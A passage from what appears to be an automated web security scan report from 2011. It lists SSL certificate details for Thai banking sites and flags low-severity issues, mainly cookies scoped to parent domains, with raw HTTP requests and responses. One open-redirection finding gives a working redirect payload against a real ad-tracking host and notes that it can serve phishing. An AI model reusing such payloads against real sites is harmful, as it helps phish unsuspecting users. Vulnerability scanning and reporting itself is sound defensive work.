Issued to:  www.ktb.co.th
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Tue Mar 16 19:00:00 CDT 2010
Valid to:  Mon May 16 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.26. https://www.ktbonline.ktb.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ktbonline.ktb.co.th
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.ktbonline.ktb.co.th
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Sun Apr 18 19:00:00 CDT 2010
Valid to:  Thu May 19 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.27. https://www.newcb.ktb.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newcb.ktb.co.th
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.newcb.ktb.co.th
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Sun Apr 18 19:00:00 CDT 2010
Valid to:  Thu May 19 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.28. https://www.scb-fx.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scb-fx.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.scb-fx.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Thu Sep 10 19:00:00 CDT 2009
Valid to:  Mon Sep 26 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.29. https://www.scbbusinessnet.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scbbusinessnet.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.scbbusinessnet.com
Issued by:  Entrust Certification Authority - L1E
Valid from:  Wed Feb 16 20:41:47 CST 2011
Valid to:  Fri Feb 17 07:36:40 CST 2012

Certificate chain #1

Issued to:  Entrust Certification Authority - L1E
Issued by:  Entrust Root Certification Authority
Valid from:  Thu Dec 10 14:55:43 CST 2009
Valid to:  Tue Dec 10 15:25:43 CST 2019

Certificate chain #2

Issued to:  Entrust Root Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Fri Jan 05 13:20:39 CST 2007
Valid to:  Thu Jan 05 13:50:39 CST 2017

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

Certificate chain #4

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

13.30. https://www.scbeasy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scbeasy.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.scbeasy.com
Issued by:  Entrust Certification Authority - L1E
Valid from:  Fri Jun 18 08:51:35 CDT 2010
Valid to:  Sat Jun 18 09:21:34 CDT 2011

Certificate chain #1

Issued to:  Entrust Certification Authority - L1E
Issued by:  Entrust Root Certification Authority
Valid from:  Thu Dec 10 14:55:43 CST 2009
Valid to:  Tue Dec 10 15:25:43 CST 2019

Certificate chain #2

Issued to:  Entrust Root Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Fri Jan 05 13:20:39 CST 2007
Valid to:  Thu Jan 05 13:50:39 CST 2017

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

14. Open redirection  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://18.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is used to perform an HTTP redirect. The payload http%3a//a2325c22105b3c629/a%3fhttp%3a//ad.doubleclick.net/clk%3b225548374%3b49327377%3bv%3fhttps%3a//www.ally.com/index.html%3fCP%3dppc110298/x22 was submitted in the url[] parameter. This caused a redirection to the following URL:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /media/redir.php?prof=134&camp=8206&affcode=kw20564&inhURL=&cid=6850998613&networkType=search&url[]=http%3a//a2325c22105b3c629/a%3fhttp%3a//ad.doubleclick.net/clk%3b225548374%3b49327377%3bv%3fhttps%3a//www.ally.com/index.html%3fCP%3dppc110298/x22 HTTP/1.1
Host: 18.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:15:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: kenshoo_id=2c111266-6d18-a0a8-ca38-00001a14dc38; expires=Mon, 01-Aug-2011 13:15:14 GMT; path=/; domain=.xg4ken.com
Location: http://a2325c22105b3c629/a?http://ad.doubleclick.net/clk;225548374;49327377;v?https://www.ally.com/index.html?CP=ppc110298/x22
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


15. Cookie scoped to parent domain  previous  next
There are 57 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


15.1. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://online.wsj.com
Path:   /article/BT-CO-20110428-705019.html/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /article/BT-CO-20110428-705019.html/x22 HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:24:28 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=aa0f634f-2160-4807-9b6f-dd9894b18d38; domain=.wsj.com; path=/; Expires=Fri Apr 30 09:24:28 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Wed, 02-May-2012 13:24:28 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep07 - Mon 05/02/11 - 00:46:42 EDT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=36
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 82539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

15.2. http://www.thailandhotelforums.com/forum/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.thailandhotelforums.com
Path:   /forum/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forum/index.php HTTP/1.1
Host: www.thailandhotelforums.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:34:08 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.17 with Suhosin-Patch
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=5jdee9v5utii7ouils1v34hfm1; path=/; domain=.thailandhotelforums.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Tue, 03 May 2011 13:34:08 GMT
Connection: close
Content-Type: text/html; charset=TIS-620
Content-Length: 47754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <meta http-equiv="Content-T
...[SNIP]...

15.3. http://0.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://0.r.msn.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?ld=4vAUcEwrCsfPOHOfJWvfzahd0z1SFKH0Ld-UNQa7vBRdH5cN5Ilexsh9zvjynNDPhQibaJzP8PBYSObXHla3y2Ji34Dw-yiPn6khtQOhAwZOSSPOoZTcKsxg0rmGEz9wUPvWZdMGuv7N0K-HUobYRIu6f0gNMPTqNqFyi_EWN038kSiFqsleaRwoJemjcMN8olLQNoMA0INYPqUjOr9_HmsVblIDjYeZWrmOLwbHw5gCGTvT_jgndDPtSw_HPt-Cek29FLbzU0nR8Lq7KnItXk7jVUCUwd00o-FeeprxbCe1hreTyBECZjcz1daIBnYg3YUPlAk3c9Dtak5_3GjMycpfJmfHsbQTUsBg HTTP/1.1
Host: 0.r.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object Moved
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://www.bbt.com/brightbanking/?ReferralSource=AE&CampIDMaj=AGU&CampIDMin=AR&cmpid=1852
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Server: Microsoft-IIS/6.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MSAnalytics=4vcc16a56d0a797cf7f71623cf9e89a7b8818c5b6c4a9c3053352f85174e8f51f42a6b39f5bb98efc9a7111941beeec98b55b0f9a2ee67a6bd95bb0be007e897a83554094c093c66d356ce876a629c55275f463acf10; expires=Fri, 17 Jun 2011 13:14:23 GMT; domain=.r.msn.com; path=/; httponly
Date: Tue, 03 May 2011 13:14:22 GMT
Connection: close
Content-Length: 232

<HTML>
<HEAD><TITLE>Document moved</TITLE></HEAD>
<BODY><H1>Object Moved</H1>This document may be found <A HREF="http://www.bbt.com/brightbanking/?ReferralSource=AE&CampIDMaj=AGU&CampIDMin=AR&cmpid=
...[SNIP]...

15.4. http://18.xg4ken.com/media/redir.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://18.xg4ken.com
Path:   /media/redir.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/redir.php?prof=134&camp=8206&affcode=kw20564&inhURL=&cid=6850998613&networkType=search&url[]=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B225548374%3B49327377%3Bv%3Fhttps:%2F%2Fwww.ally.com%2Findex.html%3FCP%3Dppc110298/x22 HTTP/1.1
Host: 18.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:15:05 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=359781f1-9b59-6608-7ae3-00004ef4f5f9; expires=Mon, 01-Aug-2011 13:15:05 GMT; path=/; domain=.xg4ken.com
Location: http://ad.doubleclick.net/clk;225548374;49327377;v?https://www.ally.com/index.html?CP=ppc110298/x22
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


15.5. http://318395.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://318395.r.msn.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?ld=4v_hbzQm1ki-9oG09tvND_eBTqGIUVDm0kSUR9iUZR9CMnXHAXWKMgLm2GaOgPG_7pcjxea2dPwxcjFTjS5Bq2p5Md0EeC0p1Zarf_SQPT-ubYlC9_FlLvIySTWoCLXLL6adLpzRPHAHEpJznQMJhEF1idRomdWjqcl80lY5cZi0mR04GoOlZuwJxTT3BS1qCg_35fRs14kvWhnfgkeiTG6gFia-PlPMffy8LtPIFjYVXy-L4D2tke2WAnreKsO30p8ytvV65faBwoA2HaFcW8mWaUvnh16JgxAzpR3Ijm9TMgeolm7AIGotXphmF2v3tMkI2E6MZXomYHxGq-vwoaXgB1PD7ywvoR-bYqGctAZQ72SKiqv5HnW7_fmYsctyR3FqdKOlMS5GxGOHZSAAy-41tBLublWT0QLaDcMEWc4ijWguYnwwfwoKzEs-Q69yf2ReHuTpTtmGa9ylR62-V29DVUCUwdejlv-zz3lvT8Ta-Z5QXpECZjcz0Zdh1eOntgBboqV52Oxh_mPKl4ZsgaMP66Hv1X5IjaXw HTTP/1.1
Host: 318395.r.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object Moved
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://18.xg4ken.com/media/redir.php?prof=134&camp=8291&affcode=kw105114&inhURL=&cid=194175631&mType=p&queryStr=banking%20thailand&url[]=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B225549258%3B49327498%3Bb%3Fhttps:%2F%2Fwww.ally.com%2Findex.html%3FCP%3Dppc130835&defurl=http://18.xg4ken.com/media/redir.php?prof=134&camp=8291&affcode=cr117319&cid=194175631|128579|banking&mType=p&queryStr=banking%20thailand&url[]=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B225549258%3B49327498%3Bb%3Fhttps:%2F%2Fwww.ally.com%2Findex.html%3FCP%3Dppc130835
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Server: Microsoft-IIS/6.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MSConv=4v35cff036c968c17c3c1b9754b84e1414ff62a440da5c0c02d44985d7ed74a810dbd456f500115d4acf9e0563754f54078cda27c18c20afc0ee9acf4b7596edbe4e852f5389ae825cba4f47036df294640ac638b16bbe0daf8ecfd3843b248a2a337097291e8135d4f0217706256f3373e4ee30dd15e759b4834636bd3de7115e3554094c5ba596e1c689019e4221921238bc15d710; expires=Fri, 17 Jun 2011 13:14:23 GMT; path=/; httponly
Set-Cookie: MSAnalytics=4v5dbda0f9976350b2c2c6cca6605da6d02f6b4cf63351a04f5a2be016b1291f70abb1fd9970a89ed4e62259270c5dac939e0458ba819429b4390836e70a1031c13554094cd8aad20d0033775e985d9802ee578db510; expires=Fri, 17 Jun 2011 13:14:23 GMT; domain=.r.msn.com; path=/; httponly
Date: Tue, 03 May 2011 13:14:23 GMT
Connection: close
Content-Length: 674

<HTML>
<HEAD><TITLE>Document moved</TITLE></HEAD>
<BODY><H1>Object Moved</H1>This document may be found <A HREF="http://18.xg4ken.com/media/redir.php?prof=134&camp=8291&affcode=kw105114&inhURL=&cid=
...[SNIP]...

15.6. http://914188.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://914188.r.msn.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?ld=4vSbUTJoQN1kMHch7IUzSTDF6KEcmTV3oCTXTzg1UKOGWZR0438G1oXvJPheB3mW2922CmIpL8NXrE_on_nQu04FX2Dt78uVsmpPTPt91XwOcXMZtjDB0jbp3w0oWfeEivLlGA_U4dc5PsTD-rQYGAzj0P4hrqH1Fibd2MMesGk6aRXESvBIjIVzOt806rCXQsIDYL75i7hkVQdmoUnMD4T4jNaZzhVtVxl6JDLQrl2a2PhJBfQXcqGNp75zB4JQaq0nPblF8ED9Z_kJseHw0S8-TRRfP4xJAzkyC4rJOP0rAmcoWSzTxnQN4luIXbWyW3NVQJTAlcjuoAVDCKCvS3t00cA7cQJmNzPQWc4yRg8U74xcuamAYK8kna4RbL2ygf5Eb6iSn1WAMi HTTP/1.1
Host: 914188.r.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object Moved
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://clickserve.dartsearch.net/link/click?lid=43000000393928176&ds_s_kwgid=58000000008587292&ds_e_matchtype=p&ds_e_kwdid=6111125402&ds_e_adid=638791044&ds_url_v=2&sadid=44000000109057176
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Server: Microsoft-IIS/6.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MSConv=4v216bac438add5ee7de0fda170314f0a14dded8e6443205158c9f73022bcb5d5ce9346e045a891b487e98d5224ea85a6a8fbb0203ffcc25c0fad5a2f72b5cd947813abd204a19390cd345bc0fee7f6b9df5f22c45c24fdcd7314b360dc1143903c02cf2a4674ca409725437aa5d19a41e67a2bc5939de581dadbe02e61acef28b3554094ce96353b882524f4fb894d18c121c60b610; expires=Fri, 17 Jun 2011 13:14:25 GMT; path=/; httponly
Set-Cookie: MSAnalytics=4v71707473937349ea9a7176c778099a2de7aa94aed8be730ce7d53426a480dbbe8a736e1abede370809d7b3f368e70462056dbc1c443b8cd450458ecdc4fa47043554094c938d0c19692bf45e695cbf28f21bc8dd10; expires=Fri, 17 Jun 2011 13:14:25 GMT; domain=.r.msn.com; path=/; httponly
Date: Tue, 03 May 2011 13:14:25 GMT
Connection: close
Content-Length: 331

<HTML>
<HEAD><TITLE>Document moved</TITLE></HEAD>
<BODY><H1>Object Moved</H1>This document may be found <A HREF="http://clickserve.dartsearch.net/link/click?lid=43000000393928176&ds_s_kwgid=58000000
...[SNIP]...

15.7. http://a.unanimis.co.uk/fc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.unanimis.co.uk
Path:   /fc.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fc.php?script=profileTargetingCommon:profileTargetingBeacon&pid=457 HTTP/1.1
Host: a.unanimis.co.uk
Proxy-Connection: keep-alive
Referer: http://www.barclays.co.uk/Loans/P1242557963420
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OXPT=6g8AAB7JAQAAAQAAAAAAAAAAAAAAAAAA4gEAAA%3D%3D; expires=Thu, 02-Jun-2011 10:24:25 GMT; path=/; domain=.unanimis.co.uk
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

15.8. https://adwords.google.com/select/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /select/Login

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /select/Login HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: I=vUYati8BAAA.9QCH_JbBItRG1yn60m2UCA.UGa25BG6El-kYNgbC6LrsQ; Path=/select; Secure; HttpOnly
Set-Cookie: S=awfe=m8522TjmcU7OupcWx0VcUw:awfe-efe=m8522TjmcU7OupcWx0VcUw; Domain=.google.com; Path=/; Secure; HttpOnly
Set-Cookie: S_awfe=n8iBfCYlXDdEeVpw15xcAA; Domain=.google.com; Path=/; Secure; HttpOnly
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Location: /um/StartNewLogin
Date: Tue, 03 May 2011 13:14:26 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="/um/StartNewLogin">here</A>.
</BODY>
</HTML>

15.9. https://adwords.google.com/um/StartNewLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: AdsUserLocale=en; Path=/; Secure
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: S=adwords-usermgmt=b5tRlrAlRr3-k4iuyw0__w; Domain=.google.com; Path=/; Secure; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 20
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 May 2011 13:14:26 GMT
Expires: Tue, 03 May 2011 13:14:26 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

15.10. http://answers.yahoo.com/dir/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://answers.yahoo.com
Path:   /dir/index

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dir/index HTTP/1.1
Host: answers.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:14:24 GMT
Set-Cookie: B=19galq96rvvtg&b=3&s=ms; expires=Tue, 03-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Imagetoolbar:
